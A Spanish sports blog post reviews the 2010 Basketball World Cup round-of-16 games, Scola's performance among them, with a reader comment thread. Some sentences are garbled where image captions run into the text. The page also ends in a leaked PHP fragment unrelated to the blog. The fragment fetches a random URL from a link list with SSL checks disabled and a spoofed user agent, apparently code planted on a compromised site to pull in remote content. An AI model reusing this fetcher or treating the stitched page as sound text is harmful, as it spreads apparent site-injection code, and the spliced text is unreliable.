Mundobasket 2010: Resumen octavos

08 de September de 2010 por TheDeerHunter

Nos quedamos con un regusto dulce tras el sensacional derbi sudaméricano de anoche. Sin embargo algunos cruces han resultado algo apagados con muy poca igualdad y emoción .

Serbia 73 – Croacia 72: Empezó la cosa bien, a punto de saltar la sorpresa en el derbi balcánico. Los croatas lograronrudy fué fundamental en la victoria frente a Grecia controlar con cierta eficacia el equilibrado “dentro-fuera” de los serbios. Partido para olvidar de Teodosic y Tepic con un terrorífico 1 de 11 entre ambos, para una producción de únicamente 5 puntitos. Banic y Tomas hicieron daño cargando el rebote a sabiendas que los pívots serbios no son los más duros a la hora de repartir leña bajo los tableros. Marco Popovic llevó el partido a un plano caótico de lanzamientos poco preparados y entradas casi suicidas y así estuvo a un suspiro de pillar descolocados a los subcampeones de Katowice. Les faltó consistencia en el 1 de 12 en triples que se marcaron Ukic, Tomas y Bogdanovic como también a la hora de minimizar el talento ofensivo de las torres serbias, sobre todo de Krstic. La última mala defensa fue ilustrativa del punto de oficio que todavía les falta a esta generación croata y que tienen los serbios grabado a fuego en su genoma.

España 80 – Grecia 72: Hablando de oficio pocos superan a los helenos en esas artes. Hicieron sudar de lo lindo a los campeones. No fue hasta pocos minutos del final cuando España pudo respirar, en manos de las genialidades de Rudy Fernandez y Navarro. “La roja” todavía está buscándose a si misma, pero tuvo lugar el renacimiento de la segunda unidad en la mejor actuación conjunta de Fran, Felipe, Llull y Raul Lopez, jugándose con ellos buena parte de los minutos decisivos. Los griegos fundamentaron sus opciones en el buen hacer de sus titulares pero pagaron la falta de refresco de garantías. En España sigue preocupando la defensa del perímetro y la falta de referencia interior que esperamos sea Marc. Con todo fue un muy gran partido y ya llueve un poquito menos por nuestras tierras.

Eslovenia 87 – Australia 58: Se le hizo de noche a Australia contra unos eslovenos más serios de lo que estamos acostumbrados. Ni una sola concesión dieron. Sin prisioneros. Les superaron en todos los aspectos del juego. Ni David Anderson ni Patrick Mills tuvieron su noche, pero para entender bien la magnitud del naufragio conviene tener presente que 20 de los 58 puntos fueron producto de un buen 80% de tiros libres por tan sólo 38 en juego. En defensa tampoco fueron el equipo aguerrido que habíamos visto en la preliminar y los eslovenos, bien dirigidos por Goran Dragic y con Brezec y Lakovic de puntas de lanza, anotaron prácticamente cuando y como quisieron. Un choque sin mucha historia, decidido al descanso.

Turquía 95 – Francia 77: Es la crónica de una muerte anunciada. ¿Dónde están ahora los Gelabale y Albicy que USA acogotó a los angoleñosajusticiaron a España en la jornada inaugural? Un jugador de la jerarquía y calidad de Nicolas Batum ha pasado casi desapercibido de principio a fin en una selección nada sobrada de talento. En frente el equipo local, que convendría empezar a tener en cuenta. Los otomanos, muy físicos, altos y atléticos, y además muy finos técnicamente, que desde hace tiempo saben como jugar a esto. Se han mostrado intratables hasta el momento y sólo les faltaba recuperar el mejor juego de su líder, Turkoglu. De poco sirvió todo el músculo y la intensidad defensiva del racial equipo francés. Turquía es clara candidata a medalla.

USA 121 – Angola 66: No sólo el hecho de haber duplicado la anotación rival superando los 120 puntos refleja la diferencia entre ambas selecciones. Los americanos cogieron casi tantos rebotes ofensivos como los totales que cerró Angola. Triplicaron en pases de canasta a sus rivales. Lanzaron con total comodidad y acierto desde cualquier punto anotando todos los miembros del equipo. Robaron fácil y por contra no se dejaron robar ni un triste balón. Sólo les faltaba ya que Odom y Kevin Love lanzaran de 3 con un 100% de acierto…
El baño fue total y lo más destacable del equipo USA es que mantuvieran la concentración como si de un entrenamiento serio se hubiera tratado. Pero no llegó a ser ni eso.

Rusia 78 – Nueva Zelanda 56: No pudo ser. Algunos todavía soñábamos con que los “Kiwis” de Pero Cameron, Kleiza superó a Jian LiPenney y Abercrombie dieran otra campanada más. Los rusos, aún sin Khryapa y sin ser el equipo más talentoso con el que han competido nunca, todavía se acuerdan de defender. El equipo neozelandés, como era previsible, se estrelló contra la talla de los rusos. Mozgov hizo el agosto y los rusos arrasaron bajo tableros. Vorontsevich fue la estrella del partido con un extraordinario doble doble 18-11 en puntos y rebotes.

Lituania 78 – China 67: No esperábamos que los chinos fueran más que simples comparsas en estos octavos. Teníamos más ganas de presenciar el duelo individual Jianlian vs Kleiza, dos de las estrellas más destacadas en este campeonato. Sin embargo, los lituanos tuvieron que sudar bastante más de lo esperado para seguir adelante y el duelo individual se vió en seguida excesivamente desigual en favor de Kleiza, el cual cuajó su partido más completo hasta la fecha. Por parte china, el jugador de los Nets no pudo escapar de un una buena defensa y fue el tirador Wei Liu el artífice de mantener a su equipo en el partido durante la mayor parte del mismo. La diferencia reboteadora volvió a ser decisiva y quitando a Ji el resto de compañeros no pudieron ofrecer resistencia a los atléticos lituanos.

Argentina 93 – Brasil 89: El DUELO con mayúsculas de octavos. El mejor partido del campeonato, siendo difícil queScola protagonista del partido del Campeonato algún otro lo supere proximamente. Un auténtico “must-see” que cualquier buen aficionado al baloncesto debería guardar en sus vitrinas. Desde ya un clásico del mundobasket. Les costará olvidar a Varejao (bastante mermado) y a Splitter la lección  magistral que impartió Luis Scola bajo los aros. Nada menos que 37 puntos, 9 rebotes, 3 asistencias y 2 robos, absolutamente imparable cuando más tensión había en el ambiente. Una riqueza de registros que cuesta ver en ningún interior hoy en día. Será difícil que tras esta exhibición alguién pueda discutirle el MVP del campeonato.
Pero esto no fue todo, aún estando muy bien arropado por Delfino, el “Pancho” Jasen y por la extraordinaria defensa de Oberto (¡qué parejita se perdió Popovic, por dios!) se las vieron y desearon para doblegar a Brasil, genialmente comandada por un inmenso Marcelinho Huertas y por la peligrosidad de su línea exterior (Leandrinho y Machado)
Fue una verdadera oda al intercambio de canastas, a cada cual más difícil y más bella. Uno de los mejores partidos de baloncesto que un servidor haya visto… Ah! y como anécdota ganó Argentina.

Comenta

7 comentarios a esta entrada

  1. Love Denise dice:
    #1

    Partidazo de Scola anoche, mientras que Splitter estuvo missing.
    No creo que haya que culpar a Batum de la debacle francesa, que juegue en la NBA no quiere decir que tenga que ser el lider de su selección y echarse el equipo a sus espaldas, él en la NBA no es un lider, es un jugador de equipo, un especialista defensivo; es dificil cambiar de rol en tan corto espacio de tiempo, además no creo que Batum tenga las cualidades para ejercer de lider. De todas formas, si Francia hubiera contado con Parker, Mickael Pietrus, Turiaf y Noah, creo que los turcos se hubiesen ido para casa con el rabo entre las piernas.

      Citar

  2. aro_pasado_no_newtoniano dice:
    #2

    Nada Love Denise,,,Francia nada ;),,saltarines en las gaunas y un base penetrador,,de los mejores, cierto. El bueno es De Colo,,,y ha estodo más bien ausente.

    Y desde mi humilde punto de vista,,,,menos aún contra Turquia.

    Scola for president, ya!!!!

      Citar

  3. Love Denise dice:
    #3

    De COlo?? bueno si, para dar 5 minutos de descanso a Parker estaría bien.

    España eliminada. No creo que sea un fracaso, los serbios han hecho el partido de su vida culminando con el triplazo de Teodosic a 8,5 metros que le entraria 1 de cada 20 partidos. Nada que reprochar excepto la ultima jugada, donde no se que cojones hacia Navarro sacando cuando debería haber sido él el que recibiera ese balón. En fín, la final será Turquia – EEuu, y el 3er puesto entre Serbia y Argentina.

      Citar

  4. TheDeerHunter dice:
    #4

    Exáctamente no le culpo a Batum… pero desde luego que creo que tiene cualidades para hacer mucho más de lo que ha hecho. Y bueno, si el líder de esa selección tiene que ser Gelabale, pues con poco…
    Con Parker, Pietrus, Turiaf y… ¿Noah francés? hubieran perdido como siempre

    Por cierto, que De Colo es cualquier cosa menos alguien para dar descanso precisamente a PArker

      Citar

  5. TheDeerHunter dice:
    #5

    Por cierto, LDenise… empezamos bien con Barnes
    arrestrado por malos tratos

    no coment

      Citar

  6. Love Denise dice:
    #6

    en primer lugar, hay que ver lo que ha pasado realmente, pero….repasa el historial de tus queridos Kobe y Artest, o el de tu añorado Allen Iverson….

      Citar

  7. Love Denise dice:
    #7

    Por cierto en Francia tambien faltaban Beaubois y Kirksay; y no tengas la menor duda de que si Noah juega algun campeonato, lo hará con Francia.
    Un equipo con Parker – Batum – Mickael Pietrus – Diaw – Noah, y en el banco Albicy – De Colo – Kirksay – Beaubois – Gelabale – Turiaf – Koffi – Mahinmi y un buen entrenador que los cohesione y los involucre en el proyecto, sería muy serio candidato a ganar el Mundial y sin lugar a dudas con un físico muy superior al resto excepto os EEUU

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>